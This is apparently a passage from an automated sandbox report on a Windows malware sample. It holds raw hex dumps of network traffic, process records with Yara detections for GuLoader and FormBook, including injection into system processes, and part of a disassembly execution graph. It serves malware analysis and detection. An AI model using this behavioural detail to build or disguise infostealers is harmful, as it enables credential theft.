                                                                                                                                                                                  2024-10-08 19:52:10 UTC4895INData Raw: 0d 7a 5a 1c 1b 9d 74 77 5c 38 a1 10 4c 4e fe e4 4f d7 ec 38 61 e8 a4 ea 4c 14 4c 85 4e 1b 81 f0 c8 82 48 a8 29 9e f2 48 5c db cf 65 23 90 7a 78 96 8c 61 9e 89 53 f6 0e 91 0a 50 a6 dd fc 60 eb e1 83 f6 35 bb 66 f3 f7 b1 bc 1c 3b 47 fc 4a 43 e6 13 09 55 d4 5b c0 81 9d 7d 39 b6 6a c2 95 05 e9 11 ad 29 64 43 b6 aa 5b ee bd 2d 40 4c 21 17 3c 71 41 17 31 57 b4 c4 24 b3 40 fd 70 d2 36 2a 79 bf d2 e6 65 6c b4 da ca ab 2a 36 f6 61 49 ac d8 e0 12 29 a8 ee 28 88 32 d3 c7 f7 99 0a 64 4c 14 91 be 4b 0b 84 10 be 23 8b 93 82 b9 19 1d b5 71 a3 1a c5 d6 5c 6c f0 eb d7 df 22 17 5a ee 68 06 73 f3 14 dd fb 98 bc 1e e2 a2 6d 10 47 7a 54 bc 05 c4 09 07 19 41 bb 26 fc 2a 21 a8 db ae 6f 49 5a fa 5e 28 05 85 a1 93 07 72 0c cd 42 4b 9e d8 b4 21 a1 8e de 14 75 93 79 9b d9 1d 85 06
                                                                                                                                                                                  Data Ascii: zZtw\8LNO8aLLNH)H\e#zxaSP`5f;GJCU[}9j)dC[-@L!<qA1W$@p6*yel*6aI)(2dLK#q\l"ZhsmGzTA&*!oIZ^(rBK!uy
                                                                                                                                                                                  2024-10-08 19:52:10 UTC4895INData Raw: 6d bd 57 01 38 0d 62 44 44 66 61 e2 9f d7 f8 b9 bc 64 4d 93 3f 55 b2 c3 4f 74 6e 77 c8 b7 3e 74 0b 62 b3 4e 24 43 c0 32 bc d3 eb c0 ef e9 c1 7e 7e 13 28 80 96 17 9e ad 0c 6d c8 f6 47 f8 78 ec d2 b8 8a 51 21 b8 91 22 53 37 6b 6e bd 94 db f7 13 e4 d1 c3 fc 83 34 4f 64 80 8a f1 28 15 36 08 b3 a1 bb f5 f2 cb 3e 28 b8 e1 57 ff 54 08 8e 1f c8 c6 71 ce 4b f0 fc a0 ed 7a b0 36 8b 46 90 66 73 3c c3 3d 65 cf 1f 1c 03 49 29 20 1f 71 30 ee 21 65 91 69 79 4c b3 58 b2 ed 78 9e 06 bd c8 0a 93 be df e9 19 a7 93 e3 b0 cc 98 4d f0 8a 8f 96 38 22 ef 48 af 1d b1 7b ed be 67 92 7a 4f 15 c7 67 ce 0d ef fb ab e9 35 38 4d b4 b4 a4 db e8 4a 8a 5c 28 d7 8c c4 8d a0 e5 12 fe db 5d a6 56 d0 c2 fc 56 c7 4f 66 0b 37 ae f1 60 97 45 ba 4e 1d 61 47 6b 2c 4b cc 73 d9 90 b4 78 04 90 b5 53
                                                                                                                                                                                  Data Ascii: mW8bDDfadM?UOtnw>tbN$C2~~(mGxQ!"S7kn4Od(6>(WTqKz6Ffs<=eI) q0!eiyLXxM8"H{gzOg58MJ\(]VVOf7`ENaGk,KsxS
                                                                                                                                                                                  2024-10-08 19:52:10 UTC12INData Raw: d8 c1 f1 f8 7c 25 38 e4 33 64 e5 ef
                                                                                                                                                                                  Data Ascii: |%83d
                                                                                                                                                                                  2024-10-08 19:52:10 UTC1255INData Raw: 5b c9 f8 fd 9b 32 76 ee 91 59 27 a3 b7 bb 36 39 f5 af f3 b1 cd 41 07 75 9f 6e e4 ae 52 5d 87 a5 94 9e 25 92 cc bd 8e 78 93 55 75 5f 23 b9 ff 5d d2 8a 72 8b c0 2f 43 72 4c 22 b3 ef 8b f7 cb 61 f2 c8 c7 75 db 96 00 b7 f3 98 69 23 34 12 37 a2 6e f4 d2 1b ae fc 26 ee bc 5e 63 37 07 ea 67 b0 e9 dc 4c 0d 25 f3 15 a3 5b 94 47 c1 5d 17 c8 47 b1 03 59 d3 50 12 51 b0 c9 a6 c5 6a d7 e8 10 17 c6 a5 d7 57 46 bd 36 f8 50 d4 67 4a 51 ec 50 d2 3c c7 ab 8f ea 99 c5 21 91 d9 88 85 f1 12 71 5a 8d b9 28 c2 7f 1d c8 a4 da c3 ca d5 46 48 2d 17 54 b6 ff 16 33 25 17 53 9a 52 d7 5d d0 89 91 f0 8a 7e 5f 61 2a a5 9a 16 3f 07 f0 bd 5f bb 59 39 cf 81 19 40 7f 9e 77 ca 12 25 f2 70 ea 24 47 d3 5c 17 6d f1 92 f1 6d 03 d5 41 51 47 18 8f 7f bd c7 cb 1c 18 a9 33 53 b7 56 40 22 d0 f4 a1 2f
                                                                                                                                                                                  Data Ascii: [2vY'69AunR]%xUu_#]r/CrL"aui#47n&^c7gL%[G]GYPQjWF6PgJQP<!qZ(FH-T3%SR]~_a*?_Y9@w%p$G\mmAQG3SV@"/
                                                                                                                                                                                  2024-10-08 19:52:10 UTC1255INData Raw: 13 5d 1c 53 7e 4b 09 4d d2 3b c4 02 76 05 05 a5 70 16 34 f7 92 d5 66 9e f4 5c 0c 86 b0 99 a0 95 2d 72 2f 50 98 0c e9 92 f3 a8 cc f0 21 63 cb eb e2 97 2d 5e ae 5e 7b 73 1a b1 36 30 2e be 36 ba 43 86 1c 61 79 d9 aa b8 7f ba e6 f1 2c 88 64 ca ad 13 89 c7 6e 9a eb 5c cc 99 03 1f f3 4b 4e d7 5b 9f 6b 53 77 04 37 96 c1 5f aa cd 4a d1 25 04 8d a2 65 28 4e 93 34 56 20 30 90 0d dc 92 30 d0 c5 80 9a eb 5b dc 75 ca 2c bd e9 4e 20 dd 27 27 3d 14 ff 49 39 dd 62 aa 21 64 7b af a2 8f c7 d0 f5 7d 80 83 d6 b1 e0 75 fc 11 09 d9 3d c1 6b 15 77 09 98 c5 6d 47 14 6b 18 47 d4 59 7b 41 df 50 f3 9e fa a6 70 2d 15 de 87 58 d3 d2 75 e1 a3 8a b3 2a d3 e7 8f 56 a5 2e 48 56 a3 24 83 29 15 b9 2a 9b ef 72 5b 53 5e ba 8a 90 e8 cf ec b6 97 43 3d 6f af f9 6c 91 de a7 cc 55 6a 26 ec d4 99
                                                                                                                                                                                  Data Ascii: ]S~KM;vp4f\-r/P!c-^^{s60.6Cay,dn\KN[kSw7_J%e(N4V 00[u,N ''=I9b!d{}u=kwmGkGY{APp-Xu*V.HV$)*r[S^C=olUj&
                                                                                                                                                                                  2024-10-08 19:52:10 UTC1255INData Raw: 81 2c 71 c6 48 51 1e 6d 09 71 4f ce b9 bd 2d 78 59 7c c1 44 8a 5a 3d 20 8c 38 8b 00 30 a4 c4 4e 5d 3b d2 4e 77 39 33 14 2f 82 66 21 22 00 49 94 fa c6 a0 88 83 54 ff ed 9a 67 e8 8d 5c b5 60 2e 05 05 b0 29 4c 21 9c c3 39 34 ea 08 22 a4 b2 0c 38 3d f1 fb 24 bb 63 77 af de ec 5b 88 42 62 e3 fb 88 84 c4 bf 95 c0 8f d5 b1 9d d2 ba 3a ea 21 59 d4 62 cb 9b 87 6a 60 09 5f 90 8b d9 92 3b c2 18 f9 29 27 97 a5 8a 1f 16 0b 4d bf e9 f2 de 86 45 28 cd 14 8d 2f 92 7d f9 38 75 08 84 fc 8d ae 8e 00 9e 2d 27 1d 8c 6e 28 ab d1 fc 0c 25 cb fb 58 01 2d 79 b7 c9 9c 2f 2e 17 15 73 03 84 34 36 80 d0 9e f2 a9 ee ac 30 ab 22 63 03 d2 94 76 0a b7 5d f2 90 f1 06 83 95 39 20 95 a8 8e a6 12 9a 4c ba 91 db 29 07 75 31 39 32 a8 46 3c a7 b8 d0 e5 65 75 6a af e1 46 3d 7e 55 ed d4 42 77 91
                                                                                                                                                                                  Data Ascii: ,qHQmqO-xY|DZ= 80N];Nw93/f!"ITg\`.)L!94"8=$cw[Bb:!Ybj`_;)'ME(/}8u-'n(%X-y/.s460"cv]9 L)u192F<eujF=~UBw
                                                                                                                                                                                  2024-10-08 19:52:10 UTC1255INData Raw: 8b 9f 1b 95 6c b3 27 48 4b a0 48 82 b7 0e a6 4e 68 1b ee c3 8d 8c 73 03 c7 0a 95 fe 34 c1 10 f1 57 8d df ad 3b a8 c9 b2 9e 71 48 b5 6c 11 72 97 de 99 04 ad 38 40 53 c5 ed 5d 9f ae 32 56 76 c0 b8 84 60 ba dc d6 35 58 07 4e fa 8d 4e 2d 99 93 b8 21 3d bd 03 12 01 b5 ba 8f 41 76 9f 69 9e 70 29 19 07 58 a1 3b 72 ca 74 64 f3 fa 11 b7 86 16 53 a2 ee a5 b6 60 75 36 c4 4a cf 92 8b 3f bf 76 56 88 e8 00 a7 3e 2e a3 39 d7 f8 0b 3a 79 80 2d d2 15 44 a7 c4 b9 77 74 5e 45 79 4f a4 2d 28 17 a0 fd d7 1e fb 71 cc 8b 32 cd f0 fa 63 f5 f0 12 8f fe 91 33 73 c3 0b 89 46 b3 2b 86 aa a3 8a 4d 06 85 02 fa dc 0b 41 f4 48 2b f2 59 b1 0e 0f 47 0b 5e 4a 11 59 7c ba 57 23 84 a0 4b e4 b8 1b 1e 65 cd 0d 08 90 40 5b 18 a2 ed 93 02 37 42 60 04 9d 50 53 6c 91 33 71 0a ea 81 78 31 6c b6 a5
                                                                                                                                                                                  Data Ascii: l'HKHNhs4W;qHlr8@S]2Vv`5XNN-!=Avip)X;rtdS`u6J?vV>.9:y-Dwt^EyO-(q2c3sF+MAH+YG^JY|W#Ke@[7B`PSl3qx1l
                                                                                                                                                                                  2024-10-08 19:52:10 UTC1255INData Raw: 6f b6 b2 1f 9a 30 25 09 ee b5 f8 98 b8 7b 2c 90 e9 88 ba 4d 56 4d 0b 5b 7c 2d 01 34 53 97 52 3a 13 1d 49 f6 d0 f0 ec 89 b6 b2 8e 0c 5c 5e ea db dc ea d6 13 1d 7b 40 4e 67 b7 53 b1 92 97 d9 ef 45 e5 95 3f 89 11 bf 6c 3f 55 0b 5c 64 30 11 7a f0 f9 db b6 cc f7 ef 96 65 22 0a 75 5a 64 e3 c3 b8 1e d4 fa ba 89 fe c2 e6 09 21 84 8a 62 63 c7 48 38 c8 bb 85 2f b4 97 eb 9a 7c c6 e0 4c 9f 5b 44 50 3e 76 1d 8e b2 18 ce 01 3c bd 0f f4 e3 e8 fa bd 56 b4 10 e4 ec 2d 4d 61 54 54 32 0b d5 ff c8 c1 e7 32 00 ec 4c 20 b7 37 bc f8 28 8f 06 16 55 d4 60 22 8d ed 66 58 5c 42 b3 59 a5 b3 33 4d a9 00 bf 81 90 86 35 e0 f9 8b d0 d8 f8 a7 39 78 8f 78 42 24 b2 0d 78 cf 47 b0 5d bd 5b 73 87 10 92 88 f2 b8 56 fa 14 ea 07 d7 0b ef f4 4f c6 29 e8 26 18 43 a0 f7 d2 5c e5 cb 6e 47 32 ae e9
                                                                                                                                                                                  Data Ascii: o0%{,MVM[|-4SR:I\^{@NgSE?l?U\d0ze"uZd!bcH8/|L[DP>v<V-MaTT22L 7(U`"fX\BY3M59xxB$xG][sVO)&C\nG2
                                                                                                                                                                                  2024-10-08 19:52:10 UTC1255INData Raw: b6 2f ba ac a9 28 86 83 af 77 e2 5d 43 bc 4d 3c 62 a3 52 3c d6 ba 49 f6 1a da 26 f5 a8 fc d3 79 fb 7a 33 d5 b7 2e a1 1e eb af 3f d2 14 70 66 96 9d 23 46 a8 19 c5 08 87 82 c1 fd fb 73 7e 5c bf ec 45 05 9b f0 1b d7 9e 1a 06 29 14 81 58 04 29 df 6e 03 69 8f 6d db 91 8b df 6e 7c d1 74 a2 88 05 1a 56 0d 19 c1 b7 43 80 e0 a2 e2 2f 0a 4f 04 61 80 93 c2 14 bb 56 a4 c9 4d 7a 59 e9 55 22 ec 19 4d ee 7f 74 55 14 d4 9c fb b4 1c 63 d4 c6 67 b3 d0 e7 ea c2 b6 5d 81 5b 6a d9 94 4f 5e ec 15 ce d8 3f 5c d4 22 11 f1 8a 92 85 ed f3 c2 6d 7b 6a 07 31 99 3f 73 d1 65 cb f2 11 1c 7c 1e 61 1a c2 e6 7f e3 22 95 30 4c 04 c8 5a 98 ef ee 91 21 e4 af 40 36 c8 21 2b 38 51 3d 54 5e 58 2d 5e a3 7c 38 b0 f1 cc 38 2a ea a2 43 5e 5f 1b 41 fe 5f 94 ac 1e aa 29 30 74 67 59 39 64 b1 85 41 eb
                                                                                                                                                                                  Data Ascii: /(w]CM<bR<I&yz3.?pf#Fs~\E)X)nimn|tVC/OaVMzYU"MtUcg][jO^?\"m{j1?se|a"0LZ!@6!+8Q=T^X-^|88*C^_A_)0tgY9dA
                                                                                                                                                                                  2024-10-08 19:52:10 UTC1255INData Raw: 8e 99 a0 a1 65 90 fa 6e 5d d2 10 01 78 d4 e1 42 cd 55 07 e0 34 77 22 03 84 3c 67 db d2 ed 90 cd 9a 06 c4 9b 8f a2 c1 b0 4b 1c f3 13 80 06 9d 1b 66 7d f3 1f c5 a9 33 8f 01 1d 31 dd c7 2c 61 ea f6 3d 0c 81 e4 bf b4 c2 25 14 cb 45 1c 24 47 a5 13 e1 0f 58 e3 cb 32 42 07 c9 ac fc df 22 34 40 8e 22 4b ce 53 f7 94 04 95 04 a9 d1 47 53 7b 59 70 51 51 94 d8 ac b4 d7 c1 45 a9 66 59 3d 04 65 55 02 6b 12 83 a4 d2 24 c5 a7 bf af 95 6b 22 bd ba 4f 92 07 f3 ad 7a ab 6f f0 ec eb 72 02 30 06 0b 97 e7 3b 90 34 02 e6 93 4f 98 5b 40 25 fa a0 29 b0 ff 61 56 0d 36 58 c7 12 09 db 59 e1 96 ef da 1f 1d 1b 36 dc 70 67 87 33 a1 d9 d1 a5 2c 57 89 c8 02 44 ef 6c ed d9 b1 86 02 b8 12 86 ed 90 c6 b0 1f cf 3a e9 14 ef c5 29 ba d6 5c 95 e0 d4 54 bc 04 32 ed 61 84 81 f9 b1 83 d9 61 d1 23
                                                                                                                                                                                  Data Ascii: en]xBU4w"<gKf}31,a=%E$GX2B"4@"KSGS{YpQQEfY=eUk$k"Ozor0;4O[@%)aV6XY6pg3,WDl:)\T2aa#


                                                                                                                                                                                  Statistics

                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:15:51:40
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Oogoninia.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:633'576 bytes
                                                                                                                                                                                  MD5 hash:18FB2CCCAA9AC71624EACEADA006E938
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1193487825.0000000002E02000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:15:51:59
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Oogoninia.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:633'576 bytes
                                                                                                                                                                                  MD5 hash:18FB2CCCAA9AC71624EACEADA006E938
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                  Start time:15:52:18
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                  File size:16'696'840 bytes
                                                                                                                                                                                  MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                  Start time:15:52:19
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\grpconv.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Windows\SysWOW64\grpconv.exe"
                                                                                                                                                                                  Imagebase:0x500000
                                                                                                                                                                                  File size:40'448 bytes
                                                                                                                                                                                  MD5 hash:5A13926732E6D349FD060C072BC7FB74
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                  Start time:15:54:52
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                  Imagebase:0x7ff68bab0000
                                                                                                                                                                                  File size:4'849'904 bytes
                                                                                                                                                                                  MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:16.9%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:14.4%
                                                                                                                                                                                    Signature Coverage:21.5%
                                                                                                                                                                                    Total number of Nodes:1468
                                                                                                                                                                                    Total number of Limit Nodes:37
                                                                                                                                                                                    execution_graph 4624 10001000 4627 1000101b 4624->4627 4634 100014bb 4627->4634 4629 10001020 4630 10001024 4629->4630 4631 10001027 GlobalAlloc 4629->4631 4632 100014e2 3 API calls 4630->4632 4631->4630 4633 10001019 4632->4633 4636 100014c1 4634->4636 4635 100014c7 4635->4629 4636->4635 4637 100014d3 GlobalFree 4636->4637 4637->4629 4638 402241 4639 402ace 18 API calls 4638->4639 4640 402247 4639->4640 4641 402ace 18 API calls 4640->4641 4642 402250 4641->4642 4643 402ace 18 API calls 4642->4643 4644 402259 4643->4644 4645 4060a4 2 API calls 4644->4645 4646 402262 4645->4646 4647 402273 lstrlenA lstrlenA 4646->4647 4651 402266 4646->4651 4649 404fb9 25 API calls 4647->4649 4648 404fb9 25 API calls 4652 40226e 4648->4652 4650 4022af SHFileOperationA 4649->4650 4650->4651 4650->4652 4651->4648 4653 4043c3 4654 404400 4653->4654 4655 4043ef 4653->4655 4656 40440c GetDlgItem 4654->4656 4663 40446b 4654->4663 4714 40557a GetDlgItemTextA 4655->4714 4658 404420 4656->4658 4662 404434 SetWindowTextA 4658->4662 4666 4058ab 4 API calls 4658->4666 4659 40454f 4712 4046f9 4659->4712 4719 40557a GetDlgItemTextA 4659->4719 4660 4043fa 4661 40600b 5 API calls 4660->4661 4661->4654 4715 403f85 4662->4715 4663->4659 4668 405dc2 18 API calls 4663->4668 4663->4712 4671 40442a 4666->4671 4673 4044df SHBrowseForFolderA 4668->4673 4669 40457f 4674 405900 18 API calls 4669->4674 4671->4662 4678 405812 3 API calls 4671->4678 4672 404450 4675 403f85 19 API calls 4672->4675 4673->4659 4676 4044f7 CoTaskMemFree 4673->4676 4677 404585 4674->4677 4679 40445e 4675->4679 4680 405812 3 API calls 4676->4680 4720 405da0 lstrcpynA 4677->4720 4678->4662 4718 403fba SendMessageA 4679->4718 4682 404504 4680->4682 4685 40453b SetDlgItemTextA 4682->4685 4689 405dc2 18 API calls 4682->4689 4684 404464 4688 406139 5 API calls 4684->4688 4685->4659 4686 40459c 4687 406139 5 API calls 4686->4687 4695 4045a3 4687->4695 4688->4663 4690 404523 lstrcmpiA 4689->4690 4690->4685 4692 404534 lstrcatA 4690->4692 4691 4045df 4721 405da0 lstrcpynA 4691->4721 4692->4685 4694 4045e6 4696 4058ab 4 API calls 4694->4696 4695->4691 4700 405859 2 API calls 4695->4700 4701 404637 4695->4701 4697 4045ec GetDiskFreeSpaceA 4696->4697 4699 404610 MulDiv 4697->4699 4697->4701 4699->4701 4700->4695 4711 4046a8 4701->4711 4722 40483f 4701->4722 4703 40140b 2 API calls 4707 4046cb 4703->4707 4705 4046aa SetDlgItemTextA 4705->4711 4706 40469a 4725 40477a 4706->4725 4733 403fa7 EnableWindow 4707->4733 4710 4046e7 4710->4712 4734 404358 4710->4734 4711->4703 4711->4707 4737 403fec 4712->4737 4714->4660 4716 405dc2 18 API calls 4715->4716 4717 403f90 SetDlgItemTextA 4716->4717 4717->4672 4718->4684 4719->4669 4720->4686 4721->4694 4723 40477a 21 API calls 4722->4723 4724 404695 4723->4724 4724->4705 4724->4706 4726 404790 4725->4726 4727 405dc2 18 API calls 4726->4727 4728 4047f4 4727->4728 4729 405dc2 18 API calls 4728->4729 4730 4047ff 4729->4730 4731 405dc2 18 API calls 4730->4731 4732 404815 lstrlenA wsprintfA SetDlgItemTextA 4731->4732 4732->4711 4733->4710 4735 404366 4734->4735 4736 40436b SendMessageA 4734->4736 4735->4736 4736->4712 4738 40408d 4737->4738 4739 404004 GetWindowLongA 4737->4739 4739->4738 4740 404015 4739->4740 4741 404024 GetSysColor 4740->4741 4742 404027 4740->4742 4741->4742 4743 404037 SetBkMode 4742->4743 4744 40402d SetTextColor 4742->4744 4745 404055 4743->4745 4746 40404f GetSysColor 4743->4746 4744->4743 4747 404066 4745->4747 4748 40405c SetBkColor 4745->4748 4746->4745 4747->4738 4749 404080 CreateBrushIndirect 4747->4749 4750 404079 DeleteObject 4747->4750 4748->4747 4749->4738 4750->4749 4751 402844 4752 402aac 18 API calls 4751->4752 4753 40284a 4752->4753 4754 402872 4753->4754 4755 402889 4753->4755 4761 402729 4753->4761 4756 402886 4754->4756 4757 402877 4754->4757 4758 4028a3 4755->4758 4759 402893 4755->4759 4766 405cfe wsprintfA 4756->4766 4765 405da0 lstrcpynA 4757->4765 4760 405dc2 18 API calls 4758->4760 4762 402aac 18 API calls 4759->4762 4760->4761 4762->4761 4765->4761 4766->4761 4256 401746 4257 402ace 18 API calls 4256->4257 4258 40174d 4257->4258 4259 405a42 2 API calls 4258->4259 4260 401754 4259->4260 4261 405a42 2 API calls 4260->4261 4261->4260 4767 4026c7 4768 4026cd 4767->4768 4769 4026d5 FindClose 4768->4769 4770 40295e 4768->4770 4769->4770 4771 401947 4772 402ace 18 API calls 4771->4772 4773 40194e lstrlenA 4772->4773 4774 40258a 4773->4774 4775 402749 4776 402ace 18 API calls 4775->4776 4777 402757 4776->4777 4778 40276d 4777->4778 4779 402ace 18 API calls 4777->4779 4780 4059ee 2 API calls 4778->4780 4779->4778 4781 402773 4780->4781 4803 405a13 GetFileAttributesA CreateFileA 4781->4803 4783 402780 4784 402823 4783->4784 4785 40278c GlobalAlloc 4783->4785 4786 40282b DeleteFileA 4784->4786 4787 40283e 4784->4787 4788 4027a5 4785->4788 4789 40281a CloseHandle 4785->4789 4786->4787 4804 403138 SetFilePointer 4788->4804 4789->4784 4791 4027ab 4792 403122 ReadFile 4791->4792 4793 4027b4 GlobalAlloc 4792->4793 4794 4027c4 4793->4794 4795 4027f8 4793->4795 4796 402f33 32 API calls 4794->4796 4797 405aba WriteFile 4795->4797 4802 4027d1 4796->4802 4798 402804 GlobalFree 4797->4798 4799 402f33 32 API calls 4798->4799 4801 402817 4799->4801 4800 4027ef GlobalFree 4800->4795 4801->4789 4802->4800 4803->4783 4804->4791 4266 1000270b 4267 1000275b 4266->4267 4268 1000271b VirtualProtect 4266->4268 4268->4267 4808 1000180d 4809 10001830 4808->4809 4810 10001860 GlobalFree 4809->4810 4811 10001872 4809->4811 4810->4811 4812 10001266 2 API calls 4811->4812 4813 100019e3 GlobalFree GlobalFree 4812->4813 4814 4020cd 4815 402ace 18 API calls 4814->4815 4816 4020d4 4815->4816 4817 402ace 18 API calls 4816->4817 4818 4020de 4817->4818 4819 402ace 18 API calls 4818->4819 4820 4020e8 4819->4820 4821 402ace 18 API calls 4820->4821 4822 4020f2 4821->4822 4823 402ace 18 API calls 4822->4823 4824 4020fc 4823->4824 4825 40213b CoCreateInstance 4824->4825 4826 402ace 18 API calls 4824->4826 4829 40215a 4825->4829 4831 402202 4825->4831 4826->4825 4827 401423 25 API calls 4828 402238 4827->4828 4830 4021e2 MultiByteToWideChar 4829->4830 4829->4831 4830->4831 4831->4827 4831->4828 4832 4040ce 4834 4040e4 4832->4834 4837 4041f0 4832->4837 4833 40425f 4835 404333 4833->4835 4836 404269 GetDlgItem 4833->4836 4838 403f85 19 API calls 4834->4838 4842 403fec 8 API calls 4835->4842 4839 4042f1 4836->4839 4840 40427f 4836->4840 4837->4833 4837->4835 4844 404234 GetDlgItem SendMessageA 4837->4844 4841 40413a 4838->4841 4839->4835 4848 404303 4839->4848 4840->4839 4847 4042a5 6 API calls 4840->4847 4843 403f85 19 API calls 4841->4843 4845 40432e 4842->4845 4846 404147 CheckDlgButton 4843->4846 4863 403fa7 EnableWindow 4844->4863 4861 403fa7 EnableWindow 4846->4861 4847->4839 4851 404309 SendMessageA 4848->4851 4852 40431a 4848->4852 4851->4852 4852->4845 4855 404320 SendMessageA 4852->4855 4853 40425a 4856 404358 SendMessageA 4853->4856 4854 404165 GetDlgItem 4862 403fba SendMessageA 4854->4862 4855->4845 4856->4833 4858 40417b SendMessageA 4859 4041a2 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4858->4859 4860 404199 GetSysColor 4858->4860 4859->4845 4860->4859 4861->4854 4862->4858 4863->4853 4864 4028d2 4865 402aac 18 API calls 4864->4865 4866 4028d8 4865->4866 4867 40290d 4866->4867 4869 402729 4866->4869 4870 4028ea 4866->4870 4868 405dc2 18 API calls 4867->4868 4867->4869 4868->4869 4870->4869 4872 405cfe wsprintfA 4870->4872 4872->4869 4285 4023d3 4286 4023d9 4285->4286 4287 402ace 18 API calls 4286->4287 4288 4023eb 4287->4288 4289 402ace 18 API calls 4288->4289 4290 4023f5 RegCreateKeyExA 4289->4290 4291 402729 4290->4291 4292 40241f 4290->4292 4293 402437 4292->4293 4295 402ace 18 API calls 4292->4295 4294 402443 4293->4294 4302 402aac 4293->4302 4298 402462 RegSetValueExA 4294->4298 4299 402f33 32 API calls 4294->4299 4296 402430 lstrlenA 4295->4296 4296->4293 4300 402478 RegCloseKey 4298->4300 4299->4298 4300->4291 4303 405dc2 18 API calls 4302->4303 4304 402ac1 4303->4304 4304->4294 4873 401cd4 4874 402aac 18 API calls 4873->4874 4875 401cda IsWindow 4874->4875 4876 401a0e 4875->4876 4322 4014d6 4323 402aac 18 API calls 4322->4323 4324 4014dc Sleep 4323->4324 4326 40295e 4324->4326 4334 4025d7 4335 402aac 18 API calls 4334->4335 4340 4025e1 4335->4340 4336 40264f 4337 405a8b ReadFile 4337->4340 4338 402651 4343 405cfe wsprintfA 4338->4343 4339 402661 4339->4336 4342 402677 SetFilePointer 4339->4342 4340->4336 4340->4337 4340->4338 4340->4339 4342->4336 4343->4336 4367 401759 4368 402ace 18 API calls 4367->4368 4369 401760 4368->4369 4370 401786 4369->4370 4371 40177e 4369->4371 4408 405da0 lstrcpynA 4370->4408 4407 405da0 lstrcpynA 4371->4407 4374 401791 4376 